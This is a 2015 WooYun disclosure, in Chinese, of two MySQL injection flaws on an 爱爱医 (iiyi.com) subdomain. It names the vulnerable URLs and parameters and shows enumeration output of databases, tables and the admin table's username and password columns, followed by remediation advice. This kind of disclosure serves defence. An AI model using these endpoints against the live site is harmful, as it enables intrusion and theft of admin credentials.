漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0107957
漏洞标题:爱爱医某站mysql注入两枚
相关厂商:爱爱医
漏洞作者: 大懒
提交时间:2015-04-15 10:50
修复时间:2015-04-20 14:22
公开时间:2015-04-20 14:22
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:8
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-15: 细节已通知厂商并且等待厂商处理中
2015-04-20: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
爱爱医mysql注入两枚。
详细说明:
POST形式
URL:http://jfk.iiyi.com/list/clist/?ctype=
parameter:kw
另外一枚
URL:http://jfk.iiyi.com/course/get_rec_list
parameter:page
漏洞证明:
current database: 'jfk2012'
current user: 'jfk_user@%'
available databases [3]:
[*] information_schema
[*] jfk2012
[*] test
Database: jfk2012
[17 tables]
+-------------------+
| jfk_actlog |
| jfk_admin |
| jfk_advertisement |
| jfk_article |
| jfk_case |
| jfk_casepic |
| jfk_casepost |
| jfk_courseware |
| jfk_expert |
| jfk_pointdiscuss |
| jfk_pointhit |
| jfk_pubclass |
| jfk_qaexpert |
| jfk_recommend_log |
| jfk_viewcount |
| zj_expert |
| zj_interview |
+-------------------+
可以发现有jfk_admin这张表,进入admin的表
Table: jfk_admin
[8 columns]
+-----------+-----------------------+
| Column | Type |
+-----------+-----------------------+
| dateline | char(11) |
| failcount | tinyint(1) |
| id | mediumint(8) unsigned |
| lastip | char(15) |
| lastvisit | int(10) |
| password | char(32) |
| status | tinyint(1) |
| username | char(15) |
+-----------+-----------------------+
有用户名和密码这样的字段。
修复方案:
1.首先关闭显错
2.过滤特殊字符单引号,及其他对业务无影响的特殊字符
3.结构化查询
版权声明:转载请注明来源 大懒@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-04-20 14:22
厂商回复:
漏洞Rank:8 (WooYun评价)
最新状态:
暂无